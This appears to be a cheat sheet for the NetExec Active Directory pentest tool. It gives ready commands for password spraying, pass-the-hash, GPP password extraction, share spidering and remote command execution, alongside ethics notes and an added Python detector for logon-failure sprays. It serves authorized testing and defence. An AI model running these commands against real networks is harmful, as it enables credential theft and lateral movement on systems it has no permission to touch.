NetExec Cheat Sheet
Modern CrackMapExec successor for AD protocol abuse and automation.
Overview
NetExec (nxc) continues the CrackMapExec model for SMB, WinRM, LDAP, MSSQL, RDP, and more, and is under active development. It is used for credential checking, enumeration, and lateral movement in authorized internal assessments. Ethics: the same constraints as CME apply. Lockouts, DCSync modules, and execution are high impact; stay in scope.
Install
pipx install git+https://github.com/Pennyw0rth/NetExec
or: pipx install netexec
nxc --version
Essential commands
nxc smb 10.10.10.0/24 -u user -p 'Password1!'
nxc smb hosts.txt -u admin -H 31d6cfe0d16ae931b73c59d7e0c089c0
nxc winrm 10.10.10.10 -u administrator -p pass
nxc ldap 10.10.10.1 -u user@corp.local -p pass -d corp.local --users
Common workflows
Auth check / spray:
nxc smb 10.10.10.0/24 -u users.txt -p 'Password1!' --no-bruteforce
nxc smb dc01.corp.local -u j.doe -p 'Winter2026!' -d corp.local
Shares and sensitive files:
nxc smb 10.10.10.5 -u user -p pass --shares
nxc smb 10.10.10.5 -u user -p pass -M gpp_password
nxc smb 10.10.10.5 -u user -p pass -M spider_plus -o OUTPUT_FOLDER=/tmp/spider
Execution:
nxc smb 10.10.10.10 -u administrator -p pass -x 'hostname'
nxc smb 10.10.10.10 -u admin -p pass -X 'Get-Process' --exec-method smbexec
LDAP:
nxc ldap 10.10.10.1 -u user -p pass -d corp.local --trusted-for-delegation
nxc ldap 10.10.10.1 -u user -p pass -M adcs
WinRM / RDP:
nxc winrm 10.10.10.10 -u administrator -p pass -x 'whoami'
nxc rdp 10.10.10.10 -u user -p pass
Flags reference
| Flag | Meaning |
|---|---|
| -u / -p | Credentials |
| -H | NTLM hash |
| -d | Domain |
| -M | Module |
| -o | Module options |
| -x / -X | CMD / PowerShell |
| --generate-hosts-file | Targets from scan |
| --log | Log path |
Tips
- Ethics: prefer targeted host lists over /24 sprays on production; document valid accounts immediately.
- nxc <protocol> -L (for example nxc smb -L) lists the modules for that protocol; read the module wiki before running invasive plugins.
- Migrate from cme to nxc command-for-command in new engagements.
- Combine with impacket and bloodhound for full AD kill chains.
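
Defensive counterpart to the auth check / spray workflow above, as an added example (not part of the original cheat sheet and not NetExec code): a sliding-window check that flags a source failing logons against many distinct accounts. The event tuples, thresholds and the function name detect_spray are assumptions constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample, not real data: (time, event ID, source IP, target account).
# 4625 = failed logon, 4624 = successful logon (Windows Security log).
SAMPLE_EVENTS = [
    ("2026-01-12T09:00:01", 4625, "10.10.10.50", "a.smith"),
    ("2026-01-12T09:00:02", 4625, "10.10.10.50", "b.jones"),
    ("2026-01-12T09:00:03", 4625, "10.10.10.50", "c.lee"),
    ("2026-01-12T09:00:04", 4624, "10.10.10.50", "j.doe"),  # success, ignored
    ("2026-01-12T09:00:05", 4625, "10.10.10.50", "d.khan"),
    ("2026-01-12T09:00:06", 4625, "10.10.10.50", "e.roy"),
    ("2026-01-12T09:10:00", 4625, "10.10.10.77", "f.wu"),   # one user mistyping
    ("2026-01-12T09:10:20", 4625, "10.10.10.77", "F.Wu"),
    ("2026-01-12T09:10:40", 4625, "10.10.10.77", "f.wu"),
    ("2026-01-12T08:00:00", 4625, "10.10.10.90", "a.smith"),  # hours apart
    ("2026-01-12T10:00:00", 4625, "10.10.10.90", "b.jones"),
    ("2026-01-12T12:00:00", 4625, "10.10.10.90", "c.lee"),
]

def detect_spray(events, window=timedelta(minutes=5), min_accounts=5):
    """Map each source IP to the accounts it failed against, for sources that
    hit at least min_accounts distinct accounts inside one sliding window."""
    by_src = defaultdict(list)
    for ts, event_id, src, account in events:
        if event_id == 4625:
            by_src[src].append((datetime.fromisoformat(ts), account.lower()))
    hits = {}
    for src, fails in by_src.items():
        fails.sort()
        start, in_window = 0, defaultdict(int)  # account -> failures in window
        for ts, account in fails:
            in_window[account] += 1
            while ts - fails[start][0] > window:  # drop failures older than window
                old = fails[start][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                start += 1
            if len(in_window) >= min_accounts:
                hits[src] = sorted(set(hits.get(src, [])) | set(in_window))
    return hits

if __name__ == "__main__":
    for src, accounts in detect_spray(SAMPLE_EVENTS).items():
        print(f"possible spray from {src}: {len(accounts)} accounts {accounts}")
```

Counting distinct accounts rather than raw failures keeps a single user mistyping a password (10.10.10.77 in the sample) out of the results.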